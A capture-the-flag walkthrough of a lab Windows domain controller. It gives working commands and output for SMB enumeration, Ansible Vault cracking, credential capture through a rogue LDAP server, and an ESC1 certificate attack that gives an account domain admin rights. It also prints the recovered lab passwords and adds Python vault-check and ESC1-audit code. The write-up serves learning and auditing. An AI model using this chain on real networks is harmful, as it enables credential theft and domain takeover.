Authority
Introduction
The Authority machine required us to enumerate the host, which revealed an anonymously accessible SMB share containing Ansible Vault secrets and a service running on port 8443. By cracking the vault password and decrypting the secrets, we gained access to the configuration manager of the service on port 8443. By reconfiguring that service to connect to a rogue LDAP server, we captured plaintext credentials, which gave us a shell on the host over WinRM. Further enumeration identified a vulnerable certificate template; exploiting it with an ESC1 attack granted us administrator privileges.
Recon
nmap (TCP all ports)
Scanning all TCP ports with nmap finds the following:
$ sudo nmap -Pn -p- authority.htb
[sudo] password for kali:
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-16 04:15 EDT
Nmap scan report for 10.129.10.238
Host is up (0.048s latency).
Not shown: 65506 closed tcp ports (reset)
PORT STATE SERVICE
53/tcp open domain
80/tcp open http
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5985/tcp open wsman
8443/tcp open https-alt
9389/tcp open adws
47001/tcp open winrm
49664/tcp open unknown
49665/tcp open unknown
49666/tcp open unknown
49667/tcp open unknown
49671/tcp open unknown
49686/tcp open unknown
49687/tcp open unknown
49689/tcp open unknown
49690/tcp open unknown
49699/tcp open unknown
49710/tcp open unknown
61496/tcp open unknown
63845/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 60.97 seconds
$
nmap (service scan of the open TCP ports)
An in-depth scan of each open port finds the following:
$ sudo nmap -Pn -sCV 10.129.10.238 -p 53,80,88,135,139,389,445,464,593,636,3268,3269,5985,8443,9389,47001
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-16 04:27 EDT
Nmap scan report for 10.129.10.238
Host is up (0.054s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: IIS Windows Server
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-07-16 12:27:27Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: authority.htb, Site: Default-First-Site-Name)
|_ssl-date: 2023-07-16T12:28:36+00:00; +3h59m57s from scanner time.
| ssl-cert: Subject:
| Subject Alternative Name: othername: UPN::AUTHORITY$@htb.corp, DNS:authority.htb.corp, DNS:htb.corp, DNS:HTB
| Not valid before: 2022-08-09T23:03:21
|_Not valid after: 2024-08-09T23:13:21
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: authority.htb, Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: othername: UPN::AUTHORITY$@htb.corp, DNS:authority.htb.corp, DNS:htb.corp, DNS:HTB
| Not valid before: 2022-08-09T23:03:21
|_Not valid after: 2024-08-09T23:13:21
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: authority.htb, Site: Default-First-Site-Name)
|_ssl-date: 2023-07-16T12:28:36+00:00; +3h59m57s from scanner time.
| ssl-cert: Subject:
| Subject Alternative Name: othername: UPN::AUTHORITY$@htb.corp, DNS:authority.htb.corp, DNS:htb.corp, DNS:HTB
| Not valid before: 2022-08-09T23:03:21
|_Not valid after: 2024-08-09T23:13:21
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: authority.htb, Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: othername: UPN::AUTHORITY$@htb.corp, DNS:authority.htb.corp, DNS:htb.corp, DNS:HTB
| Not valid before: 2022-08-09T23:03:21
|_Not valid after: 2024-08-09T23:13:21
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
8443/tcp open ssl/https-alt
| ssl-cert: Subject: commonName=172.16.2.118
| Not valid before: 2023-07-14T03:07:18
|_Not valid after: 2025-07-15T14:45:42
| fingerprint-strings:
| FourOhFourRequest, GetRequest:
| HTTP/1.1 200
| Content-Type: text/html;charset=ISO-8859-1
| Content-Length: 82
| Date: Sun, 16 Jul 2023 12:27:33 GMT
| Connection: close
| <html><head><meta http-equiv="refresh" content="0;URL='/pwm'"/></head></html>
| HTTPOptions:
| HTTP/1.1 200
| Allow: GET, HEAD, POST, OPTIONS
| Content-Length: 0
| Date: Sun, 16 Jul 2023 12:27:33 GMT
| Connection: close
| RTSPRequest:
| HTTP/1.1 400
| Content-Type: text/html;charset=utf-8
| Content-Language: en
| Content-Length: 1936
| Date: Sun, 16 Jul 2023 12:27:39 GMT
| Connection: close
| <!doctype html><html lang="en"><head><title>HTTP Status 400
| Request</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 400
|_ Request</h1><hr class="line" /><p><b>Type</b> Exception Report</p><p><b>Message</b> Invalid character found in the HTTP protocol [RTSP/1.00x0d0x0a0x0d0x0a...]</p><p><b>Description</b> The server cannot or will not process the request due to something that is perceived to be a client error (e.g., malformed request syntax, invalid
|_http-title: Site doesn't have a title (text/html;charset=ISO-8859-1).
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
Service Info: Host: AUTHORITY; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2023-07-16T12:28:09
|_ start_date: N/A
|_clock-skew: mean: 3h59m56s, deviation: 0s, median: 3h59m56s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 75.73 seconds
$
HTTP - TCP 80
Looking at the service on port 80, we find only the default page of a Microsoft IIS server.
HTTPS-Alt - TCP 8443
Port 8443 serves a more interesting application. A closer look shows that it is the PWM project, version 2.0.3.
Although we now know what is running, this version does not appear to be vulnerable, and the remaining features are behind an authentication requirement.
Shell as svc_ldap
SMB
Looking at the SMB service on the machine, we find that we are able to log in as an anonymous user:
$ smbclient -N -L \\\\10.129.10.238\\
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
Department Shares Disk
Development Disk
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
SYSVOL Disk Logon server share
$
We also have access to the Development share, so we retrieve its contents as follows:
$ smbclient -N \\\\10.129.10.238\\Development
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Fri Mar 17 09:20:38 2023
.. D 0 Fri Mar 17 09:20:38 2023
Automation D 0 Fri Mar 17 09:20:40 2023
5888511 blocks of size 4096. 1336145 blocks available
smb: \> cd Automation\
smb: \Automation\> ls
. D 0 Fri Mar 17 09:20:40 2023
.. D 0 Fri Mar 17 09:20:40 2023
Ansible D 0 Fri Mar 17 09:20:50 2023
5888511 blocks of size 4096. 1336145 blocks available
smb: \Automation\> cd Ansible\
smb: \Automation\Ansible\> ls
. D 0 Fri Mar 17 09:20:50 2023
.. D 0 Fri Mar 17 09:20:50 2023
ADCS D 0 Fri Mar 17 09:20:48 2023
LDAP D 0 Fri Mar 17 09:20:48 2023
PWM D 0 Fri Mar 17 09:20:48 2023
SHARE D 0 Fri Mar 17 09:20:48 2023
5888511 blocks of size 4096. 1336145 blocks available
smb: \Automation\Ansible> cd ..
smb: \Automation\> recurse ON
smb: \Automation\> prompt OFF
smb: \Automation\> mask ""
smb: \Automation\> mget *
getting file \Automation\Ansible\ADCS\.ansible-lint of size 259 as Ansible/ADCS/.ansible-lint (1.3 KiloBytes/sec) (average 1.3 KiloBytes/sec)
<SNIP>
getting file \Automation\Ansible\ADCS\molecule\default\prepare.yml of size 371 as Ansible/ADCS/molecule/default/prepare.yml (1.8 KiloBytes/sec) (average 7.6 KiloBytes/sec)
smb: \Automation\>
Ansible Vault
Saved Secrets
Within the contents of the Development share there is a main.yml file containing Ansible Vault-encrypted credentials:
$ cat Ansible/PWM/defaults/main.yml
---
pwm_run_dir: "{{ lookup('env', 'PWD') }}"
pwm_hostname: authority.htb.corp
pwm_http_port: "{{ http_port }}"
pwm_https_port: "{{ https_port }}"
pwm_https_enable: true
pwm_require_ssl: false
pwm_admin_login: !vault |
$ANSIBLE_VAULT;1.1;AES256
32666534386435366537653136663731633138616264323230383566333966346662313161326239
6134353663663462373265633832356663356239383039640a346431373431666433343434366139
35653634376333666234613466396534343030656165396464323564373334616262613439343033
6334326263326364380a653034313733326639323433626130343834663538326439636232306531
3438
pwm_admin_password: !vault |
$ANSIBLE_VAULT;1.1;AES256
31356338343963323063373435363261323563393235633365356134616261666433393263373736
3335616263326464633832376261306131303337653964350a363663623132353136346631396662
38656432323830393339336231373637303535613636646561653637386634613862316638353530
3930356637306461350a316466663037303037653761323565343338653934646533663365363035
6531
ldap_uri: ldap://127.0.0.1/
ldap_base_dn: "DC=authority,DC=htb"
ldap_admin_password: !vault |
$ANSIBLE_VAULT;1.1;AES256
63303831303534303266356462373731393561313363313038376166336536666232626461653630
3437333035366235613437373733316635313530326639330a643034623530623439616136363563
34646237336164356438383034623462323531316333623135383134656263663266653938333334
3238343230333633350a646664396565633037333431626163306531336336326665316430613566
3764
$
Crack Vault Key
To crack the vault password we use the tool ansible2john to convert one of the vaulted values (saved to a file named vault) into a format john can attack:
$ ansible2john vault >> vault.in
The result should be of the format:
vault:$ansible$0*0*2fe48d56e7e16f71c18abd22085f39f4fb11a2b9a456cf4b72ec825fc5b9809d*e041732f9243ba0484f582d9cb20e148*4d1741fd34446a95e647c3fb4a4f9e4400eae9dd25d734abba49403c42bc2cd8
With this crackable hash we can point john at it and start cracking:
$ john vault.in --wordlist=/usr/share/wordlists/rockyou.txt
If all goes well we should have the following plaintext:
$ john vault.in --show
vault:!@#$%^&*
3 password hashes cracked, 0 left
$
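To see what ansible2john actually extracts, and what john then has to compute for every guess, here is the envelope taken apart in Python. This is an added example, not code from the original write-up or from the ansible2john or john projects: it parses the $ANSIBLE_VAULT;1.1;AES256 envelope of the pwm_admin_login value shown above into salt, HMAC and ciphertext, renders the $ansible$ line, and checks a candidate password the way Ansible does (PBKDF2-HMAC-SHA256 with 10,000 iterations, then HMAC-SHA256 over the ciphertext with the second derived key). AES-CTR decryption of the payload is deliberately left to ansible-vault itself.

```python
"""Parse an Ansible Vault 1.1 (AES256) envelope and check a candidate password.

Added example, not part of the original write-up or of ansible2john. It
reimplements only the envelope parsing and the HMAC check that guards the
payload; AES-CTR decryption is left to ansible-vault.
"""
import hashlib
import hmac
from binascii import unhexlify

VAULT_HEADER = "$ANSIBLE_VAULT;1.1;AES256"
PBKDF2_ITERATIONS = 10000   # fixed by Ansible's VaultAES256 implementation
KEY_LENGTH = 32             # key1 (AES-256) and key2 (HMAC-SHA256) are 32 bytes each
IV_LENGTH = 16              # AES block size, used as the CTR initial counter

# Vaulted value of pwm_admin_login, copied from the main.yml shown above.
PWM_ADMIN_LOGIN_VAULT = """$ANSIBLE_VAULT;1.1;AES256
32666534386435366537653136663731633138616264323230383566333966346662313161326239
6134353663663462373265633832356663356239383039640a346431373431666433343434366139
35653634376333666234613466396534343030656165396464323564373334616262613439343033
6334326263326364380a653034313733326639323433626130343834663538326439636232306531
3438"""


def parse_vault(text):
    """Return (salt, hmac_hex, ciphertext) from a vault envelope.

    The body after the header is hex. Once decoded it holds three
    newline-separated fields, the first and third of which are hex again:
    hexlify(salt), hmac.hexdigest(), hexlify(ciphertext).
    """
    lines = text.strip().splitlines()
    if lines[0].strip() != VAULT_HEADER:
        raise ValueError("not a $ANSIBLE_VAULT;1.1;AES256 envelope")
    body = unhexlify("".join(line.strip() for line in lines[1:]))
    salt_hex, hmac_hex, ciphertext_hex = body.split(b"\n")
    return unhexlify(salt_hex), hmac_hex.decode(), unhexlify(ciphertext_hex)


def to_john_format(text, name="vault"):
    """Render the envelope as the line ansible2john emits:
    name:$ansible$0*0*<salt>*<ciphertext>*<hmac>, all fields lowercase hex."""
    salt, hmac_hex, ciphertext = parse_vault(text)
    return "%s:$ansible$0*0*%s*%s*%s" % (name, salt.hex(), ciphertext.hex(), hmac_hex)


def derive_keys(password, salt):
    """PBKDF2-HMAC-SHA256 stretching, split into key1 (AES), key2 (HMAC) and iv."""
    derived = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt,
                                  PBKDF2_ITERATIONS, 2 * KEY_LENGTH + IV_LENGTH)
    return (derived[:KEY_LENGTH],
            derived[KEY_LENGTH:2 * KEY_LENGTH],
            derived[2 * KEY_LENGTH:])


def verify_password(text, password):
    """True if HMAC-SHA256(key2, ciphertext) matches the HMAC stored in the envelope.

    This is exactly the check a cracker performs per candidate, so the only
    per-guess cost is one PBKDF2 run: 10,000 iterations do not rescue a vault
    protected by a wordlist password.
    """
    salt, hmac_hex, ciphertext = parse_vault(text)
    _key1, key2, _iv = derive_keys(password, salt)
    computed = hmac.new(key2, ciphertext, hashlib.sha256).hexdigest()
    return hmac.compare_digest(computed, hmac_hex)


if __name__ == "__main__":
    print(to_john_format(PWM_ADMIN_LOGIN_VAULT))
    print("password accepted:", verify_password(PWM_ADMIN_LOGIN_VAULT, "!@#$%^&*"))
```

The 16-byte ciphertext is a single PKCS7-padded AES block, which is consistent with the short plaintext recovered in the next step; the salt is per-vault, so the same password protecting several values still has to be attacked once per value.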
Decrypt Secrets
Now that we know the vault password, we can use the tool ansible-vault to decrypt each value and retrieve the plaintext as follows:
$ echo '$ANSIBLE_VAULT;1.1;AES256
32666534386435366537653136663731633138616264323230383566333966346662313161326239
6134353663663462373265633832356663356239383039640a346431373431666433343434366139
35653634376333666234613466396534343030656165396464323564373334616262613439343033
6334326263326364380a653034313733326639323433626130343834663538326439636232306531
3438' | ansible-vault decrypt
Vault password:
Decryption successful
svc_pwm
$ echo '$ANSIBLE_VAULT;1.1;AES256
31356338343963323063373435363261323563393235633365356134616261666433393263373736
3335616263326464633832376261306131303337653964350a363663623132353136346631396662
38656432323830393339336231373637303535613636646561653637386634613862316638353530
3930356637306461350a316466663037303037653761323565343338653934646533663365363035
6531' | ansible-vault decrypt
Vault password:
Decryption successful
pWm_@dm!N_!23
$ echo '$ANSIBLE_VAULT;1.1;AES256
63303831303534303266356462373731393561313363313038376166336536666232626461653630
3437333035366235613437373733316635313530326639330a643034623530623439616136363563
34646237336164356438383034623462323531316333623135383134656263663266653938333334
3238343230333633350a646664396565633037333431626163306531336336326665316430613566
3764' | ansible-vault decrypt
Vault password:
Decryption successful
DevT3st@123
$
Found Credentials
With this we are able to retrieve the following credentials:
svc_pwm:pWm_@dm!N_!23
admin:DevT3st@123
PWM
Trying the recovered credentials on the PWM configuration manager login page, we are able to log in to the service.
Misconfigured Service
Looking at the service, we can see that the LDAP configuration is not working.
Fix the service configuration
The LDAP component of the service is not configured correctly; we fix it as follows.
If we now test the LDAP connection, we should get the following result.
This tells us that the PWM service can indeed connect to an LDAP server.
Evil LDAP
Now that we know the service can connect to LDAP, we can make two assumptions: first, that the service must authenticate to LDAP, most likely with a set of credentials; and second, that it will authenticate to whatever target host is configured. If we point the PWM configuration at a rogue LDAP server, the service should hand its credentials to that server.
To test this, we first create a rogue LDAP service with the help of the tool Responder:
$ sudo responder -I tun0 -A
__
.----.-----.-----.-----.-----.-----.--| |.-----.----.
| _| -__|__ --| _ | _ | | _ || -__| _|
|__| |_____|_____| __|_____|__|__|_____||_____|__|
|__|
NBT-NS, LLMNR & MDNS Responder 3.1.3.0
To support this project:
Patreon -> https://www.patreon.com/PythonResponder
Paypal -> https://paypal.me/PythonResponder
Author: Laurent Gaffie ([email protected])
To kill this script hit CTRL-C
[+] Poisoners:
LLMNR [OFF]
NBT-NS [OFF]
MDNS [OFF]
DNS [ON]
DHCP [OFF]
[+] Servers:
HTTP server [ON]
HTTPS server [ON]
WPAD proxy [OFF]
Auth proxy [OFF]
SMB server [ON]
Kerberos server [ON]
SQL server [ON]
FTP server [ON]
IMAP server [ON]
POP3 server [ON]
SMTP server [ON]
DNS server [ON]
LDAP server [ON]
RDP server [ON]
DCE-RPC server [ON]
WinRM server [ON]
[+] HTTP Options:
Always serving EXE [OFF]
Serving EXE [OFF]
Serving HTML [OFF]
Upstream Proxy [OFF]
[+] Poisoning Options:
Analyze Mode [ON]
Force WPAD auth [OFF]
Force Basic Auth [OFF]
Force LM downgrade [OFF]
Force ESS downgrade [OFF]
[+] Generic Options:
Responder NIC [tun0]
Responder IP [10.10.15.92]
Responder IPv6 [dead:beef:2::115a]
Challenge set [random]
Don't Respond To Names ['ISATAP']
[+] Current Session Variables:
Responder Machine Name [WIN-R1C5MF173PF]
Responder Domain Name [I7QR.LOCAL]
Responder DCE-RPC Port [47342]
[+] Listening for events...
With Responder running, we only need to configure the target LDAP host in PWM.
Now if we test the ldap profile our responder will receive an authentication request:
[+] Responder is in analyze mode. No NBT-NS, LLMNR, MDNS requests will be poisoned.
[LDAP] Cleartext Client : 10.129.10.0
[LDAP] Cleartext Username : CN=svc_ldap,OU=Service Accounts,OU=CORP,DC=authority,DC=htb
[LDAP] Cleartext Password : lDaP_1n_th3_cle4r!
[*] Skipping previously captured cleartext password for CN=svc_ldap,OU=Service Accounts,OU=CORP,DC=authority,DC=htb
[+] Exiting...
As we can see, PWM sent a bind request to our rogue server, and because the credentials were transmitted in cleartext, Responder captured the plaintext password.
Found Credentials
With this we are able to retrieve the following credentials:
svc_ldap:lDaP_1n_th3_cle4r!
WinRM shell
Now that we have a set of credentials, we can take advantage of the open WinRM port to log in and obtain a PowerShell shell:
$ evil-winrm -i authority.htb -u svc_ldap -p lDaP_1n_th3_cle4r! -s . -e .
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc_ldap\Documents> whoami
htb\svc_ldap
*Evil-WinRM* PS C:\Users\svc_ldap\Documents>
Shell as administrator
Checking our privileges on the host, we quickly realize that we don't have many:
*Evil-WinRM* PS C:\Users\svc_ldap> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
*Evil-WinRM* PS C:\Users\svc_ldap>
But by enumerating the host a bit, we find an unusual directory in the root of the system drive, Certs:
*Evil-WinRM* PS C:\> ls
Directory: C:\
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 4/23/2023 6:16 PM Certs
d----- 3/28/2023 1:59 PM Department Shares
d----- 3/17/2023 9:20 AM Development
d----- 8/9/2022 7:00 PM inetpub
d----- 3/24/2023 8:22 PM PerfLogs
d-r--- 3/25/2023 1:20 AM Program Files
d----- 3/25/2023 1:19 AM Program Files (x86)
d----- 4/23/2023 6:23 PM pwm
d-r--- 3/24/2023 11:27 PM Users
d----- 7/12/2023 1:19 PM Windows
-a---- 8/10/2022 8:44 PM 84784749 pwm-onejar-2.0.3.jar
*Evil-WinRM* PS C:\>
ESC1 attack
Certificates are a key component of an AD environment; one way to enumerate misconfigurations in Active Directory Certificate Services is to run the tool Certify:
*Evil-WinRM* PS C:\Users\svc_ldap> ./Certify.exe find /vulnerable
_____ _ _ __
/ ____| | | (_)/ _|
| | ___ _ __| |_ _| |_ _ _
| | / _ \ '__| __| | _| | | |
| |___| __/ | | |_| | | | |_| |
\_____\___|_| \__|_|_| \__, |
__/ |
|___./
v1.0.0
[*] Action: Find certificate templates
[*] Using the search base 'CN=Configuration,DC=authority,DC=htb'
[*] Listing info about the Enterprise CA 'AUTHORITY-CA'
Enterprise CA Name : AUTHORITY-CA
DNS Hostname : authority.authority.htb
FullName : authority.authority.htb\AUTHORITY-CA
Flags : SUPPORTS_NT_AUTHENTICATION, CA_SERVERTYPE_ADVANCED
Cert SubjectName : CN=AUTHORITY-CA, DC=authority, DC=htb
Cert Thumbprint : 42A80DC79DD9CE76D032080B2F8B172BC29B0182
Cert Serial : 2C4E1F3CA46BBDAF42A1DDE3EC33A6B4
Cert Start Date : 4/23/2023 9:46:26 PM
Cert End Date : 4/23/2123 9:56:25 PM
Cert Chain : CN=AUTHORITY-CA,DC=authority,DC=htb
UserSpecifiedSAN : Disabled
CA Permissions :
Owner: BUILTIN\Administrators S-1-5-32-544
Access Rights Principal
Allow Enroll NT AUTHORITY\Authenticated Users S-1-5-11
Allow ManageCA, ManageCertificates BUILTIN\Administrators S-1-5-32-544
Allow ManageCA, ManageCertificates HTB\Domain Admins S-1-5-21-622327497-3269355298-2248959698-512
Allow ManageCA, ManageCertificates HTB\Enterprise Admins S-1-5-21-622327497-3269355298-2248959698-519
Enrollment Agent Restrictions : None
[!] Vulnerable Certificates Templates :
CA Name : authority.authority.htb\AUTHORITY-CA
Template Name : CorpVPN
Schema Version : 2
Validity Period : 20 years
Renewal Period : 6 weeks
msPKI-Certificate-Name-Flag : ENROLLEE_SUPPLIES_SUBJECT
mspki-enrollment-flag : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS, AUTO_ENROLLMENT_CHECK_USER_DS_CERTIFICATE
Authorized Signatures Required : 0
pkiextendedkeyusage : Client Authentication, Document Signing, Encrypting File System, IP security IKE intermediate, IP security user, KDC Authentication, Secure Email
mspki-certificate-application-policy : Client Authentication, Document Signing, Encrypting File System, IP security IKE intermediate, IP security user, KDC Authentication, Secure Email
Permissions
Enrollment Permissions
Enrollment Rights : HTB\Domain Admins S-1-5-21-622327497-3269355298-2248959698-512
HTB\Domain Computers S-1-5-21-622327497-3269355298-2248959698-515
HTB\Enterprise Admins S-1-5-21-622327497-3269355298-2248959698-519
Object Control Permissions
Owner : HTB\Administrator S-1-5-21-622327497-3269355298-2248959698-500
WriteOwner Principals : HTB\Administrator S-1-5-21-622327497-3269355298-2248959698-500
HTB\Domain Admins S-1-5-21-622327497-3269355298-2248959698-512
HTB\Enterprise Admins S-1-5-21-622327497-3269355298-2248959698-519
WriteDacl Principals : HTB\Administrator S-1-5-21-622327497-3269355298-2248959698-500
HTB\Domain Admins S-1-5-21-622327497-3269355298-2248959698-512
HTB\Enterprise Admins S-1-5-21-622327497-3269355298-2248959698-519
WriteProperty Principals : HTB\Administrator S-1-5-21-622327497-3269355298-2248959698-500
HTB\Domain Admins S-1-5-21-622327497-3269355298-2248959698-512
HTB\Enterprise Admins S-1-5-21-622327497-3269355298-2248959698-519
Certify completed in 00:00:09.1681935
*Evil-WinRM* PS C:\Users\svc_ldap>
With this we find that the certificate template CorpVPN is present and vulnerable to an ESC1 attack.
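Why Certify flags CorpVPN: the template lets the enrollee supply the subject and SAN (ENROLLEE_SUPPLIES_SUBJECT), carries the Client Authentication EKU, requires no authorized signature or manager approval, and grants enrollment to Domain Computers, a group that any account holding SeMachineAccountPrivilege (which svc_ldap has, as the whoami /priv output above shows) can join by creating a machine account. The following Python audit check is an added example and not part of the original write-up or of Certify: it encodes those ESC1 conditions over the template fields transcribed from the Certify output above. The set of low-privileged principals and the hardened() remediation are assumptions of the example, the latter illustrating the two usual fixes (remove the subject flag, require CA manager approval).

```python
"""Evaluate a certificate template against the ESC1 conditions.

Added example, not part of the original write-up or of Certify. The template
dictionary is transcribed from the Certify output in the write-up; the keys
are Certify's display labels rather than raw AD attribute names.
"""

# Principals whose membership a non-admin can obtain: every domain user is in
# Authenticated Users / Domain Users, and SeMachineAccountPrivilege (or a
# non-zero MachineAccountQuota) lets a user create a Domain Computers member.
# This set is an assumption of the example; extend it for your own domain.
LOW_PRIV_PRINCIPALS = {
    "HTB\\Domain Computers",
    "HTB\\Domain Users",
    "NT AUTHORITY\\Authenticated Users",
    "Everyone",
}

# EKUs that make an issued certificate usable for domain authentication.
AUTH_EKUS = {"Client Authentication", "PKINIT Client Authentication",
             "Smart Card Logon", "Any Purpose"}

# CorpVPN as reported by Certify above.
CORPVPN = {
    "Template Name": "CorpVPN",
    "msPKI-Certificate-Name-Flag": ["ENROLLEE_SUPPLIES_SUBJECT"],
    "mspki-enrollment-flag": ["INCLUDE_SYMMETRIC_ALGORITHMS", "PUBLISH_TO_DS",
                              "AUTO_ENROLLMENT_CHECK_USER_DS_CERTIFICATE"],
    "Authorized Signatures Required": 0,
    "pkiextendedkeyusage": ["Client Authentication", "Document Signing",
                            "Encrypting File System", "IP security IKE intermediate",
                            "IP security user", "KDC Authentication", "Secure Email"],
    "Enrollment Rights": ["HTB\\Domain Admins", "HTB\\Domain Computers",
                          "HTB\\Enterprise Admins"],
}


def esc1_findings(template, ca_allows_low_priv_enroll=True):
    """Return the ESC1 conditions this template satisfies, one string each.

    ca_allows_low_priv_enroll mirrors the CA-level 'Allow Enroll' right that
    Certify reports for Authenticated Users above; without it, template
    enrollment rights alone are not enough.
    """
    findings = []
    if "ENROLLEE_SUPPLIES_SUBJECT" in template["msPKI-Certificate-Name-Flag"]:
        findings.append("requester chooses the subject/SAN (ENROLLEE_SUPPLIES_SUBJECT)")
    if "PEND_ALL_REQUESTS" not in template["mspki-enrollment-flag"]:
        findings.append("no CA manager approval (PEND_ALL_REQUESTS not set)")
    if template["Authorized Signatures Required"] == 0:
        findings.append("no authorized signature required")
    ekus = set(template["pkiextendedkeyusage"])
    if not ekus or AUTH_EKUS & ekus:          # an empty EKU list means any purpose
        findings.append("EKU permits client authentication")
    low = LOW_PRIV_PRINCIPALS & set(template["Enrollment Rights"])
    if low and ca_allows_low_priv_enroll:
        findings.append("low-privileged enrollment by " + ", ".join(sorted(low)))
    return findings


def is_esc1(template, ca_allows_low_priv_enroll=True):
    """True only when all five conditions are present at once."""
    return len(esc1_findings(template, ca_allows_low_priv_enroll)) == 5


def hardened(template):
    """Remediated copy: the enrollee no longer supplies the subject, and every
    request is held for CA manager approval."""
    fixed = dict(template)
    fixed["msPKI-Certificate-Name-Flag"] = [
        f for f in template["msPKI-Certificate-Name-Flag"] if f != "ENROLLEE_SUPPLIES_SUBJECT"]
    fixed["mspki-enrollment-flag"] = template["mspki-enrollment-flag"] + ["PEND_ALL_REQUESTS"]
    return fixed


if __name__ == "__main__":
    for finding in esc1_findings(CORPVPN):
        print("[!]", finding)
    print("ESC1:", is_esc1(CORPVPN), "-> after hardening:", is_esc1(hardened(CORPVPN)))
```

Breaking any single condition is enough to defeat ESC1; removing ENROLLEE_SUPPLIES_SUBJECT is the most robust fix because it stops the requester from naming another principal in the SAN at all, while manager approval and tightened enrollment rights reduce who can request and who must sign off.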
To take advantage of this vulnerability we will first add a computer to the domain:
$ impacket-addcomputer authority.htb/svc_ldap:'lDaP_1n_th3_cle4r!' -computer-name HI1$ -computer-pass 123456
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Successfully added machine account HI1$ with password 123456.
$
After adding the computer we will request a certificate as the newly created machine account:
$ certipy req -u 'HI1$' -p '123456' -ca AUTHORITY-CA -target authority.htb -template CorpVPN -upn [email protected] -dns authority.authority.htb -dc-ip 10.129.9.248
Certipy v4.5.1 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 3
[*] Got certificate with multiple identifications
UPN: '[email protected]'
DNS Host Name: 'authority.authority.htb'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'administrator_authority.pfx'
$
From the retrieved PFX we extract two files: the certificate without its private key, and the private key without the certificate.
$ certipy cert -pfx administrator_authority.pfx -nokey -out user.crt
Certipy v4.5.1 - by Oliver Lyak (ly4k)
[*] Writing certificate and to 'user.crt'
$ certipy cert -pfx administrator_authority.pfx -nocert -out user.key
Certipy v4.5.1 - by Oliver Lyak (ly4k)
[*] Writing private key to 'user.key'
$
Now, using the passthecert.py tool, we can authenticate to the LDAP server with the certificate and key and add our user to the Administrators group:
$ python3 passthecert.py -action ldap-shell -crt user.crt -key user.key -domain authority.htb -dc-ip 10.129.9.248
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
add_user_to_group svc_ldap Administrators
Type help for list of commands
# add_user_to_group svc_ldap Administrators
Adding user: svc_ldap to group Administrators result: OK
# Bye!
What remains is to check our group memberships, which confirms that we now have administrator access:
*Evil-WinRM* PS C:\Users\svc_ldap> net user svc_ldap
User name svc_ldap
Full Name
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 8/10/2022 9:29:31 PM
Password expires Never
Password changeable 8/11/2022 9:29:31 PM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon 7/5/2023 8:43:09 PM
Logon hours allowed All
Local Group Memberships *Administrators *Remote Management Use
Global Group memberships *Domain Users
The command completed successfully.
*Evil-WinRM* PS C:\Users\svc_ldap>